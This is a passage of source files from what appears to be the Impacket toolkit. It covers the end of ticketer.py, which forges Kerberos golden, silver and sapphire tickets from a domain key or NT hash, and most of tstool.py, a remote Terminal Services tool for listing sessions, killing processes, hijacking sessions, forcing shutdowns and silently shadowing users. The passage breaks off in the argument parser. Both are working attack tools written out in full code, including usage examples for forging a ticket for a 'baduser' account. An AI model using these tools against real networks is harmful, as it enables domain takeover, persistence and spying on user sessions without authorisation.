unhexlify(self.__options.aesKey))\n elif cipher.enctype == EncryptionTypes.aes128_cts_hmac_sha1_96.value:\n key = Key(cipher.enctype, unhexlify(self.__options.aesKey))\n elif cipher.enctype == EncryptionTypes.rc4_hmac.value:\n key = Key(cipher.enctype, unhexlify(self.__options.nthash))\n else:\n raise Exception('Unsupported enctype 0x%x' % cipher.enctype)\n\n # Key Usage 2\n # AS-REP Ticket and TGS-REP Ticket (includes TGS session\n # key or application session key), encrypted with the\n # service key (Section 5.3)\n logging.info('\\tEncTicketPart')\n cipherText = cipher.encrypt(key, 2, encodedEncTicketPart, None)\n\n kdcRep['ticket']['enc-part']['cipher'] = cipherText\n kdcRep['ticket']['enc-part']['kvno'] = 2\n\n # Lastly.. we have to encrypt the kdcRep['enc-part'] part\n # with a key we chose. It actually doesn't really matter since nobody uses it (could it be trash?)\n encodedEncASRepPart = encoder.encode(encASorTGSRepPart)\n\n if self.__domain == self.__server:\n # Key Usage 3\n # AS-REP encrypted part (includes TGS session key or\n # application session key), encrypted with the client key\n # (Section 5.4.2)\n sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets())\n logging.info('\\tEncASRepPart')\n cipherText = cipher.encrypt(sessionKey, 3, encodedEncASRepPart, None)\n else:\n # Key Usage 8\n # TGS-REP encrypted part (includes application session\n # key), encrypted with the TGS session key\n # (Section 5.4.2)\n sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets())\n logging.info('\\tEncTGSRepPart')\n cipherText = cipher.encrypt(sessionKey, 8, encodedEncASRepPart, None)\n\n kdcRep['enc-part']['cipher'] = cipherText\n kdcRep['enc-part']['etype'] = cipher.enctype\n kdcRep['enc-part']['kvno'] = 1\n\n if logging.getLogger().level == logging.DEBUG:\n logging.debug('Final Golden Ticket')\n print(kdcRep.prettyPrint())\n print('\\n')\n\n return encoder.encode(kdcRep), cipher, sessionKey\n\n def saveTicket(self, ticket, sessionKey):\n logging.info('Saving ticket in %s' % (self.__target.replace('/', '.') + '.ccache'))\n from impacket.krb5.ccache import CCache\n ccache = CCache()\n\n if self.__server == self.__domain:\n ccache.fromTGT(ticket, sessionKey, sessionKey)\n else:\n ccache.fromTGS(ticket, sessionKey, sessionKey)\n ccache.saveFile(self.__target.replace('/','.') + '.ccache')\n\n def run(self):\n ticket, adIfRelevant = self.createBasicTicket()\n if ticket is not None:\n encASorTGSRepPart, encTicketPart, pacInfos = self.customizeTicket(ticket, adIfRelevant)\n ticket, cipher, sessionKey = self.signEncryptTicket(ticket, encASorTGSRepPart, encTicketPart, pacInfos)\n self.saveTicket(ticket, sessionKey)\n\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help=True, description=\"Creates a Kerberos golden/silver tickets based on \"\n \"user options\")\n parser.add_argument('target', action='store', help='username for the newly created ticket')\n parser.add_argument('-spn', action=\"store\", help='SPN (service/server) of the target service the silver ticket will'\n ' be generated for. if omitted, golden ticket will be created')\n parser.add_argument('-request', action='store_true', default=False, help='Requests ticket to domain and clones it '\n 'changing only the supplied information. It requires specifying -user')\n parser.add_argument('-domain', action='store', required=True, help='the fully qualified domain name (e.g. contoso.com)')\n parser.add_argument('-domain-sid', action='store', required=True, help='Domain SID of the target domain the ticker will be '\n 'generated for')\n parser.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key used for signing the ticket '\n '(128 or 256 bits)')\n parser.add_argument('-nthash', action=\"store\", help='NT hash used for signing the ticket')\n parser.add_argument('-keytab', action=\"store\", help='Read keys for SPN from keytab file (silver ticket only)')\n parser.add_argument('-groups', action=\"store\", default = '513, 512, 520, 518, 519', help='comma separated list of '\n 'groups user will belong to (default = 513, 512, 520, 518, 519)')\n parser.add_argument('-user-id', action=\"store\", default = '500', help='user id for the user the ticket will be '\n 'created for (default = 500)')\n parser.add_argument('-extra-sid', action=\"store\", help='Comma separated list of ExtraSids to be included inside the ticket\\'s PAC')\n parser.add_argument('-extra-pac', action='store_true', help='Populate your ticket with extra PAC (UPN_DNS)')\n parser.add_argument('-old-pac', action='store_true', help='Use the old PAC structure to create your ticket (exclude '\n 'PAC_ATTRIBUTES_INFO and PAC_REQUESTOR')\n parser.add_argument('-duration', action=\"store\", default = '87600', help='Amount of hours till the ticket expires '\n '(default = 24*365*10)')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-user', action=\"store\", help='domain/username to be used if -request is chosen (it can be '\n 'different from domain/username')\n group.add_argument('-password', action=\"store\", help='password for domain/username')\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) specified in the target parameter')\n parser.add_argument('-impersonate', action=\"store\", help='Sapphire ticket. target username that will be impersonated (through S4U2Self+U2U)'\n ' for querying the ST and extracting the PAC, which will be'\n ' included in the new ticket')\n\n if len(sys.argv)==1:\n parser.print_help()\n print(\"\\nExamples: \")\n print(\"\\t./ticketer.py -nthash -domain-sid -domain baduser\\n\")\n print(\"\\twill create and save a golden ticket for user 'baduser' that will be all encrypted/signed used RC4.\")\n print(\"\\tIf you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256\")\n print(\"\\t(depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as\")\n print(\"\\tbaduser.ccache.\\n\")\n print(\"\\t./ticketer.py -nthash -aesKey -domain-sid -domain \" \n \" -request -user -password baduser\\n\")\n print(\"\\twill first authenticate against the KDC (using -user/-password) and get a TGT that will be used\")\n print(\"\\tas template for customization. Whatever encryption algorithms used on that ticket will be honored,\")\n print(\"\\thence you might need to specify both -nthash and -aesKey data. Ticket will be generated for 'baduser'\")\n print(\"\\tand saved as baduser.ccache\")\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n if options.domain is None:\n logging.critical('Domain should be specified!')\n sys.exit(1)\n\n if options.aesKey is None and options.nthash is None and options.keytab is None:\n logging.error('You have to specify either aesKey, or nthash, or keytab')\n sys.exit(1)\n\n if options.aesKey is not None and options.nthash is not None and options.request is False:\n logging.error('You cannot specify both -aesKey and -nthash w/o using -request. Pick only one')\n sys.exit(1)\n\n if options.request is True and options.user is None:\n logging.error('-request parameter needs -user to be specified')\n sys.exit(1)\n\n if options.request is True and options.hashes is None and options.password is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n else:\n password = options.password\n\n if options.impersonate:\n # args that can't be None: -aesKey, -domain-sid, -nthash, -request, -domain, -user, -password\n # -user-id can't be None except if -old-pac is set\n # args that can't be False: -request\n missing_params = [\n param_name\n for (param, param_name) in\n zip(\n [\n options.request,\n options.aesKey, options.nthash,\n options.domain, options.user, options.password,\n options.domain_sid, options.user_id\n ],\n [\n \"-request\",\n \"-aesKey\", \"-nthash\",\n \"-domain\", \"-user\", \"-password\",\n \"-domain-sid\", \"-user-id\"\n ]\n )\n if param is None or (param_name == \"-request\" and not param)\n ]\n if missing_params:\n logging.error(f\"missing parameters to do sapphire ticket : {', '.join(missing_params)}\")\n sys.exit(1)\n if not options.old_pac and not options.user_id:\n logging.error(f\"missing parameter -user-id. Must be set if not doing -old-pac\")\n sys.exit(1)\n # ignored params: -extra-pac, -extra-sid, -groups, -duration\n # -user-id ignored if -old-pac\n ignored_params = []\n if options.extra_pac: ignored_params.append(\"-extra-pac\")\n if options.extra_sid is not None: ignored_params.append(\"-extra-sid\")\n if options.groups is not None: ignored_params.append(\"-groups\")\n if options.duration is not None: ignored_params.append(\"-duration\")\n if ignored_params:\n logging.error(f\"doing sapphire ticket, ignoring following parameters : {', '.join(ignored_params)}\")\n if options.old_pac and options.user_id is not None:\n logging.error(f\"parameter -user-id will be ignored when specifying -old-pac in a sapphire ticket attack\")\n\n try:\n executer = TICKETER(options.target, password, options.domain, options)\n executer.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n print(str(e))\n" }, { "path": "examples/tstool.py", "content": "#!/usr/bin/env python3\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Terminal Services manipulation tool.\n# Initial idea was to provide similar functionality as the QWINSTA and other TS* windows commands:\n# \n# qwinsta: Display information about Remote Desktop Services sessions.\n# tasklist: Display a list of currently running processes on the system.\n# taskkill: Terminate tasks by process id (PID) or image name\n# tscon: Attaches a user session to a remote desktop session\n# tsdiscon: Disconnects a Remote Desktop Services session\n# tslogoff: Signs-out a Remote Desktop Services session\n# shutdown: Remote shutdown\n# msg: Send a message to Remote Desktop Services session (MSGBOX)\n# shadow: Shadow a Remote Desktop Services session\n#\n# Author:\n# Alexander Korznikov (@nopernik)\n#\n# Reference for:\n# [MS-TSTS]\n#\n\nimport argparse\nimport codecs\nimport logging\nimport sys\nfrom xml.etree.ElementTree import tostring\nimport xml.etree.ElementTree as ET\nfrom struct import unpack\n\nfrom impacket import version\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket.smbconnection import SMBConnection\nfrom impacket import LOG\nfrom impacket.dcerpc.v5 import transport, lsat, lsad\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, DCERPCException\nfrom impacket.dcerpc.v5.dtypes import MAXIMUM_ALLOWED\n\nfrom impacket.dcerpc.v5 import tsts as TSTS\nfrom impacket.dcerpc.v5.tsts import (\n SHADOW_CONTROL_REQUEST, \n SHADOW_PERMISSION_REQUEST, \n SHADOW_REQUEST_RESPONSE\n)\nimport traceback\n\n\nclass TSHandler:\n def __init__(self, username, password, domain, options):\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__options = options\n self.__action = options.action.lower()\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = options.aesKey\n self.__doKerberos = options.k\n self.__kdcHost = options.dc_ip\n self.__smbConnection = None\n\n if options.hashes is not None:\n self.__lmhash, self.__nthash = options.hashes.split(':')\n\n def connect(self, remoteName, remoteHost):\n self.remoteName = remoteName\n self.__smbConnection = SMBConnection(remoteName, remoteHost, sess_port=int(self.__options.port))\n\n if self.__doKerberos:\n self.__smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey, self.__kdcHost)\n else:\n self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n\n def run(self, remoteName, remoteHost):\n if self.__options.action == 'shutdown':\n if not max([options.logoff, options.shutdown, options.reboot, options.poweroff]):\n LOG.error('At least one flag is required: -logoff, -shutdown, -reboot or -poweroff')\n exit(1)\n\n self.connect(remoteName, remoteHost)\n getattr(self,'do_'+self.__action)()\n\n def get_session_list(self):\n # Retreive session list\n with TSTS.TermSrvEnumeration(self.__smbConnection, self.__options.target_ip, self.__doKerberos) as lsm:\n handle = lsm.hRpcOpenEnum()\n rsessions = lsm.hRpcGetEnumResult(handle, Level=1)['ppSessionEnumResult']\n lsm.hRpcCloseEnum(handle)\n self.sessions = {}\n for i in rsessions:\n sess = i['SessionInfo']['SessionEnum_Level1']\n state = TSTS.enum2value(TSTS.WINSTATIONSTATECLASS, sess['State']).split('_')[-1]\n self.sessions[sess['SessionId']] = { 'state' :state,\n 'SessionName' :sess['Name'],\n 'RemoteIp' :'',\n 'ClientName' :'',\n 'Username' :'',\n 'Domain' :'',\n 'Resolution' :'',\n 'ClientTimeZone':''\n }\n\n def enumerate_sessions_config(self):\n # Get session config one by one\n if len(self.sessions):\n with TSTS.RCMPublic(self.__smbConnection, self.__options.target_ip, self.__doKerberos) as termsrv:\n for SessionId in self.sessions:\n resp = termsrv.hRpcGetClientData(SessionId)\n if resp is not None:\n self.sessions[SessionId]['RemoteIp'] = resp['ppBuff']['ClientAddress']\n self.sessions[SessionId]['ClientName'] = resp['ppBuff']['ClientName']\n if len(resp['ppBuff']['UserName']) and not len(self.sessions[SessionId]['Username']):\n self.sessions[SessionId]['Username'] = resp['ppBuff']['UserName']\n if len(resp['ppBuff']['Domain']) and not len(self.sessions[SessionId]['Domain']):\n self.sessions[SessionId]['Domain'] = resp['ppBuff']['Domain']\n self.sessions[SessionId]['Resolution'] = '{}x{}'.format(\n resp['ppBuff']['HRes'],\n resp['ppBuff']['VRes']\n )\n self.sessions[SessionId]['ClientTimeZone'] = resp['ppBuff']['ClientTimeZone']['StandardName']\n\n def enumerate_sessions_info(self):\n # Get session info one by one\n if len(self.sessions):\n with TSTS.TermSrvSession(self.__smbConnection, self.__options.target_ip, self.__doKerberos) as TermSrvSession:\n for SessionId in self.sessions.keys():\n sessdata = TermSrvSession.hRpcGetSessionInformationEx(SessionId)\n sessflags = TSTS.enum2value(TSTS.SESSIONFLAGS, sessdata['LSMSessionInfoExPtr']['LSM_SessionInfo_Level1']['SessionFlags'])\n self.sessions[SessionId]['flags'] = sessflags\n domain = sessdata['LSMSessionInfoExPtr']['LSM_SessionInfo_Level1']['DomainName']\n if not len(self.sessions[SessionId]['Domain']) and len(domain):\n self.sessions[SessionId]['Domain'] = domain\n username = sessdata['LSMSessionInfoExPtr']['LSM_SessionInfo_Level1']['UserName']\n if not len(self.sessions[SessionId]['Username']) and len(username):\n self.sessions[SessionId]['Username'] = username\n self.sessions[SessionId]['ConnectTime'] = sessdata['LSMSessionInfoExPtr']['LSM_SessionInfo_Level1']['ConnectTime']\n self.sessions[SessionId]['DisconnectTime'] = sessdata['LSMSessionInfoExPtr']['LSM_SessionInfo_Level1']['DisconnectTime']\n self.sessions[SessionId]['LogonTime'] = sessdata['LSMSessionInfoExPtr']['LSM_SessionInfo_Level1']['LogonTime']\n self.sessions[SessionId]['LastInputTime'] = sessdata['LSMSessionInfoExPtr']['LSM_SessionInfo_Level1']['LastInputTime']\n\n def do_qwinsta(self):\n options = self.__options\n desktop_states = {\n 'WTS_SESSIONSTATE_UNKNOWN': '',\n 'WTS_SESSIONSTATE_LOCK' : 'Locked',\n 'WTS_SESSIONSTATE_UNLOCK' : 'Unlocked',\n }\n self.get_session_list()\n if not len(self.sessions):\n print('No sessions found...')\n return\n self.enumerate_sessions_info()\n if options.verbose:\n self.enumerate_sessions_config()\n \n maxSessionNameLen = max([len(self.sessions[i]['SessionName'])+1 for i in self.sessions])\n maxSessionNameLen = maxSessionNameLen if len('SESSIONNAME') < maxSessionNameLen else len('SESSIONNAME')+1\n \n # maxUsernameLen = max([len(self.sessions[i]['Username'])+1 for i in self.sessions])\n maxUsernameLen = max([len(self.sessions[i]['Username']+self.sessions[i]['Domain'])+1 for i in self.sessions])+1\n\n maxUsernameLen = maxUsernameLen if len('Username') < maxUsernameLen else len('Username')+1\n \n \n maxIdLen = max([len(str(i)) for i in self.sessions])\n maxIdLen = maxIdLen if len('ID') < maxIdLen else len('ID')+1\n\n maxStateLen = max([len(self.sessions[i]['state'])+1 for i in self.sessions])\n maxStateLen = maxStateLen if len('STATE') < maxStateLen else len('STATE')+1\n\n maxRemoteIp = max([len(self.sessions[i]['RemoteIp'])+1 for i in self.sessions])\n maxRemoteIp = maxRemoteIp if len('RemoteAddress') < maxRemoteIp else len('RemoteAddress')+1\n\n maxClientName = max([len(self.sessions[i]['ClientName'])+1 for i in self.sessions])\n maxClientName = maxClientName if len('ClientName') < maxClientName else len('ClientName')+1\n\n template = ('{SESSIONNAME: <%d} '\n '{USERNAME: <%d} '\n '{ID: <%d} '\n '{STATE: <%d} '\n '{DSTATE: <9} '\n '{CONNTIME: <20} '\n '{DISCTIME: <20} ') % (maxSessionNameLen, maxUsernameLen, maxIdLen, maxStateLen)\n\n template_verbose = ('{CLIENTNAME: <%d} '\n '{REMOTEIP: <%d} '\n '{RESOLUTION: <11} '\n '{TIMEZONE: <15}') % (maxClientName,maxRemoteIp)\n\n result = []\n header = template.format(\n SESSIONNAME = 'SESSIONNAME',\n USERNAME = 'USERNAME',\n ID = 'ID',\n STATE = 'STATE',\n DSTATE = 'Desktop',\n CONNTIME = 'ConnectTime',\n DISCTIME = 'DisconnectTime',\n )\n \n header2 = template.replace(' <','=<').format(\n SESSIONNAME = '',\n USERNAME = '',\n ID = '',\n STATE = '',\n DSTATE = '',\n CONNTIME = '',\n DISCTIME = '',\n )\n\n header_verbose = ''\n header2_verbose = ''\n if options.verbose:\n header_verbose = template_verbose.format(\n CLIENTNAME = 'ClientName',\n REMOTEIP = 'RemoteAddress',\n RESOLUTION = 'Resolution',\n TIMEZONE = 'ClientTimeZone'\n )\n header2_verbose = template_verbose.replace(' <','=<').format(\n CLIENTNAME = '',\n REMOTEIP = '',\n RESOLUTION = '',\n TIMEZONE = ''\n )\n result.append(header+header_verbose)\n result.append(header2+header2_verbose+'\\n')\n \n for i in self.sessions:\n connectTime = self.sessions[i]['ConnectTime']\n connectTime = connectTime.strftime(r'%Y/%m/%d %H:%M:%S') if connectTime.year > 1601 else 'None'\n\n disconnectTime = self.sessions[i]['DisconnectTime']\n disconnectTime = disconnectTime.strftime(r'%Y/%m/%d %H:%M:%S') if disconnectTime.year > 1601 else 'None'\n userName = self.sessions[i]['Domain'] + '\\\\' + self.sessions[i]['Username'] if len(self.sessions[i]['Username']) else ''\n\n row = template.format(\n SESSIONNAME = self.sessions[i]['SessionName'],\n USERNAME = userName,\n ID = i,\n STATE = self.sessions[i]['state'],\n DSTATE = desktop_states[self.sessions[i]['flags']],\n CONNTIME = connectTime,\n DISCTIME = disconnectTime,\n )\n row_verbose = ''\n if options.verbose:\n row_verbose = template_verbose.format(\n CLIENTNAME = self.sessions[i]['ClientName'],\n REMOTEIP = self.sessions[i]['RemoteIp'],\n RESOLUTION = self.sessions[i]['Resolution'],\n TIMEZONE = self.sessions[i]['ClientTimeZone']\n ) \n result.append(row+row_verbose)\n\n for row in result:\n print(row)\n\n def lookupSids(self):\n # Slightly modified code from lookupsid.py\n try:\n stringbinding = r'ncacn_np:%s[\\pipe\\lsarpc]' % self.__options.target_ip\n rpctransport = transport.DCERPCTransportFactory(stringbinding)\n rpctransport.set_smb_connection(self.__smbConnection)\n dce = rpctransport.get_dce_rpc()\n if self.__doKerberos:\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n dce.connect()\n\n dce.bind(lsat.MSRPC_UUID_LSAT)\n sids = list(self.sids.keys())\n if len(sids) > 32:\n sids = sids[:32] # TODO in future update\n resp = lsad.hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES)\n policyHandle = resp['PolicyHandle']\n try:\n resp = lsat.hLsarLookupSids(dce, policyHandle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta)\n except DCERPCException as e:\n if str(e).find('STATUS_SOME_NOT_MAPPED') >= 0:\n resp = e.get_packet()\n else: \n raise\n for sid, item in zip(sids,resp['TranslatedNames']['Names']):\n # if item['Use'] != SID_NAME_USE.SidTypeUnknown:\n domainIndex = item['DomainIndex']\n if domainIndex == -1: # Unknown domain\n self.sids[sid] = '{}\\\\{}'.format('???', item['Name'])\n elif domainIndex >= 0:\n name = '{}\\\\{}'.format(resp['ReferencedDomains']['Domains'][item['DomainIndex']]['Name'], item['Name'])\n self.sids[sid] = name\n dce.disconnect()\n except:\n logging.debug(traceback.format_exc())\n\n def sidToUser(self, sid):\n if sid[:2] == 'S-' and sid in self.sids:\n return self.sids[sid]\n return sid\n\n def do_tasklist(self):\n options = self.__options\n with TSTS.LegacyAPI(self.__smbConnection, options.target_ip, self.__doKerberos) as legacy:\n handle = legacy.hRpcWinStationOpenServer()\n r = legacy.hRpcWinStationGetAllProcesses(handle)\n if not len(r):\n return None\n\n self.sids = {}\n for procInfo in r:\n sid = procInfo['pSid']\n if sid[:2] == 'S-' and sid not in self.sids:\n self.sids[sid] = sid\n \n self.lookupSids()\n\n maxImageNameLen = max([len(i['ImageName']) for i in r])\n maxSidLen = max([len(i['pSid']) for i in r])\n if options.verbose:\n self.get_session_list()\n self.enumerate_sessions_config()\n maxUserNameLen = max([len(self.sessions[i]['Username']+self.sessions[i]['Domain'])+1 for i in self.sessions])+1\n if maxUserNameLen < 11:\n maxUserNameLen = 11\n template = ('{imagename: <%d} '\n '{pid: <6} '\n '{sessid: <6} '\n '{sessionName: <16} '\n '{sessstate: <11} '\n '{sessionuser: <%d} '\n '{sid: <%d} '\n '{workingset: <12}') % (maxImageNameLen, maxUserNameLen, maxSidLen)\n \n print(template.format(imagename = 'Image Name',\n pid = 'PID',\n sessionName = 'SessName',\n sessid = 'SessID',\n sessionuser = 'SessUser',\n sessstate = 'State',\n sid = 'SID',\n workingset = 'Mem Usage'\n )\n )\n \n print(template.replace(' <','=<').format(imagename = '',\n pid = '',\n sessionName = '',\n sessid = '',\n sessionuser = '',\n sessstate = '',\n sid = '',\n workingset = ''\n )+'\\n'\n )\n\n for procInfo in r:\n sessId = procInfo['SessionId']\n fullUserName = ''\n if len(self.sessions[sessId]['Domain']):\n fullUserName += self.sessions[sessId]['Domain'] + '\\\\'\n if len(self.sessions[sessId]['Username']):\n fullUserName += self.sessions[sessId]['Username']\n row = template.replace('{workingset: <12}','{workingset: >10,} K').format(\n imagename = procInfo['ImageName'],\n pid = procInfo['UniqueProcessId'],\n sessionName = self.sessions[sessId]['SessionName'],\n sessid = procInfo['SessionId'],\n sessstate = self.sessions[sessId]['state'].replace('Disconnected','Disc'),\n sid = self.sidToUser(procInfo['pSid']),\n sessionuser = fullUserName,\n workingset = procInfo['WorkingSetSize']//1000\n )\n print(row)\n else:\n template = '{: <%d} {: <8} {: <11} {: <%d} {: >12}' % (maxImageNameLen, maxSidLen)\n print(template.format('Image Name', 'PID', 'Session#', 'SID', 'Mem Usage'))\n print(template.replace(': ',':=').format('','','','','')+'\\n')\n for procInfo in r:\n row = template.format(\n procInfo['ImageName'],\n procInfo['UniqueProcessId'],\n procInfo['SessionId'],\n self.sidToUser(procInfo['pSid']),\n '{:,} K'.format(procInfo['WorkingSetSize']//1000),\n )\n print(row)\n\n def do_taskkill(self):\n options = self.__options\n if options.pid is None and options.name is None:\n LOG.error('One of the following is required: -pid, -name')\n return\n pidList = []\n with TSTS.LegacyAPI(self.__smbConnection, options.target_ip, self.__doKerberos) as legacy:\n handle = legacy.hRpcWinStationOpenServer()\n if options.pid is None and options.name is not None:\n r = legacy.hRpcWinStationGetAllProcesses(handle)\n if not len(r):\n LOG.error('Could not get process list')\n return\n pidList = [i['UniqueProcessId'] for i in r if i['ImageName'].lower() == options.name.lower()]\n if not len(pidList):\n LOG.error('Could not find %r in process list' % options.name)\n return\n else:\n pidList = [options.pid]\n\n for pid in pidList:\n print('Terminating PID: %d ...' % pid, end='')\n try:\n if legacy.hRpcWinStationTerminateProcess(handle, pid)['ErrorCode']:\n print('OK')\n else:\n print('FAIL')\n except Exception as e:\n LOG.error('Error terminating pid: %d' % pid)\n LOG.error(str(e))\n\n def do_tscon(self):\n options = self.__options\n with TSTS.TermSrvSession(self.__smbConnection, options.target_ip, self.__doKerberos) as TSSession:\n try:\n session_handle = None\n print('Connecting SessionID %d to %d ...' % (options.source, options.dest), end='')\n try:\n session_handle = TSSession.hRpcOpenSession(options.source)\n except Exception as e:\n print('FAIL')\n if e.error_code == 0x80070002:\n LOG.error('Could not find source SessionID: %d' % options.source)\n else:\n LOG.error(str(e))\n return\n if TSSession.hRpcConnect(hSession = session_handle,\n TargetSessionId = options.dest,\n Password = options.password)['ErrorCode'] == 0:\n print('OK')\n else:\n print('FAIL')\n except Exception as e:\n print('FAIL')\n if e.error_code == 0x80070002:\n LOG.error('Could not find destination SessionID: %d' % options.dest)\n elif e.error_code == 0x8007139f:\n LOG.error('Session in the invalid state. Did you mean %d -> %d?' % (options.dest, options.source))\n else:\n LOG.error(str(e))\n\n def do_tsdiscon(self):\n options = self.__options\n with TSTS.TermSrvSession(self.__smbConnection, options.target_ip, self.__doKerberos) as TSSession:\n try:\n print('Disconnecting SessionID: %d ...' % options.session, end='')\n session_handle = TSSession.hRpcOpenSession(options.session)\n if TSSession.hRpcDisconnect(session_handle)['ErrorCode'] == 0:\n print('OK')\n else:\n print('FAIL')\n except Exception as e:\n print('FAIL')\n if e.error_code == 1:\n LOG.error('Maybe it is already disconnected?')\n elif e.error_code == 0x80070002:\n LOG.error('Could not find SessionID: %d' % options.session)\n else:\n LOG.error(str(e))\n\n def do_logoff(self):\n options = self.__options\n with TSTS.TermSrvSession(self.__smbConnection, options.target_ip, self.__doKerberos) as TSSession:\n try:\n print('Signing-out SessionID: %d ...' % options.session, end='')\n session_handle = TSSession.hRpcOpenSession(options.session)\n \n if TSSession.hRpcLogoff(session_handle)['ErrorCode'] == 0:\n print('OK')\n else:\n print('FAIL')\n except Exception as e:\n if e.error_code == 0x10000000:\n print('OK')\n return\n print('FAIL')\n if e.error_code == 0x80070002:\n LOG.error('Could not find SessionID: %d' % options.session)\n else:\n LOG.error(str(e))\n\n def do_shutdown(self):\n options = self.__options\n with TSTS.LegacyAPI(self.__smbConnection, options.target_ip, self.__doKerberos) as legacy:\n handle = legacy.hRpcWinStationOpenServer()\n flags = 0\n flagsList = []\n ShutdownFlags = [options.logoff, options.shutdown, options.reboot, options.poweroff]\n for k,v in zip(ShutdownFlags, ['logoff', 'shutdown', 'reboot', 'poweroff']):\n if k:\n flagsList.append(v)\n flagsList = '|'.join(flagsList)\n for k,v in zip(ShutdownFlags, [1,2,4,8]):\n if k:\n flags |= v\n try:\n print('Sending shutdown (%s) event ...' % (flagsList), end='')\n resp = legacy.hRpcWinStationShutdownSystem(handle, 0, flags)\n if resp['ErrorCode']:\n print('OK')\n else:\n resp.dump()\n print('FAIL')\n except Exception as e:\n print('FAIL')\n LOG.error(str(e))\n \n\n def do_msg(self):\n options = self.__options\n with TSTS.TermSrvSession(self.__smbConnection, options.target_ip, self.__doKerberos) as TSSession:\n try:\n print('Sending message to SessionID: %d ...' % options.session, end='')\n session_handle = TSSession.hRpcOpenSession(options.session)\n if TSSession.hRpcShowMessageBox(session_handle, options.title, options.message)['ErrorCode'] == 0:\n print('OK')\n else:\n print('FAIL')\n except Exception as e:\n print('FAIL')\n if e.error_code == 0x80070002:\n LOG.error('Could not find SessionID: %d' % options.session)\n else:\n LOG.error(str(e))\n\n def do_shadow(self):\n \"\"\"\n Request a Remote Connection String to shadow a Remote Desktop Services session.\n Author: Ilya Yatsenko (@fulc2um)\n \"\"\"\n control = (SHADOW_CONTROL_REQUEST.enumItems.SHADOW_CONTROL_REQUEST_TAKECONTROL \n if self.__options.control \n else SHADOW_CONTROL_REQUEST.enumItems.SHADOW_CONTROL_REQUEST_VIEW)\n \n perm = (SHADOW_PERMISSION_REQUEST.enumItems.SHADOW_PERMISSION_REQUEST_REQUESTPERMISSION \n if self.__options.prompt \n else SHADOW_PERMISSION_REQUEST.enumItems.SHADOW_PERMISSION_REQUEST_SILENT)\n\n LOG.info(f\"Calling RpcShadow2 (SessionId={self.__options.session}, Control={self.__options.control}, Permission={self.__options.prompt})\")\n\n try:\n with TSTS.SessEnvPublicRpc(self.__smbConnection, self.__options.target_ip, self.__doKerberos) as sErpc:\n response = sErpc.hRpcShadow2(self.__options.session, control, perm, 8192)\n\n if self.__options.debug:\n LOG.debug(f\"Response: {response.getData()}\")\n\n permission = response['pePermission']\n invitation = response['pszInvitation']\n\n except DCERPCException as e:\n LOG.error(f\"RPC Exception: {e}\")\n return\n\n if permission is not None:\n try:\n desc = TSTS.enum2value(SHADOW_REQUEST_RESPONSE, permission)\n except (KeyError, AttributeError):\n desc = \"Unknown\"\n LOG.info(f\"Permission: {permission} ({desc})\")\n\n if permission == SHADOW_REQUEST_RESPONSE.enumItems.SHADOW_REQUEST_RESPONSE_ALLOW.value:\n LOG.info(\"RpcShadow2 call succeeded!\")\n \n if not invitation:\n LOG.error(\"RpcShadow2 failed: No invitation received\")\n sys.exit(1)\n\n LOG.info(f\"Invitation received ({len(invitation)} characters)\")\n \n try:\n invitation = invitation.rstrip('\\x00\\r\\n').strip()\n \n invitation = ET.fromstring(invitation)\n except ET.ParseError:\n if invitation.startswith('<') and not invitation.endswith('>'):\n if '' in invitation:\n end_pos = invitation.rfind('') + 4\n invitation = invitation[:end_pos]\n try:\n invitation = ET.fromstring(invitation)\n except ET.ParseError:\n invitation = None\n else:\n invitation = None\n else:\n invitation = None\n \n if invitation:\n invitation = tostring(invitation, encoding='utf-8', method='xml').decode('utf-8')\n LOG.info(\"Invitation is well-formed XML\")\n with open(self.__options.file, 'w', encoding='utf-8') as f:\n f.write(invitation)\n LOG.info(f\"Saved to {self.__options.file} file\")\n else:\n LOG.error(\"Invitation does not appear to be well-formed XML\")\n else:\n LOG.error(\"RpcShadow2 failed: Permission denied\")\n sys.exit(1)\n \n\nif __name__ == '__main__':\n # Explicitly changing the stdout encoding format\n if sys.stdout.encoding is None:\n # Output is redirected to a file\n sys.stdout = codecs.getwriter('utf8')(sys.stdout)\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help=True, description=\"Terminal Services manipulation tool.\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n subparsers = parser.add_subparsers(help='actions', dest='action')\n\n # qwinsta: Display information about Remote 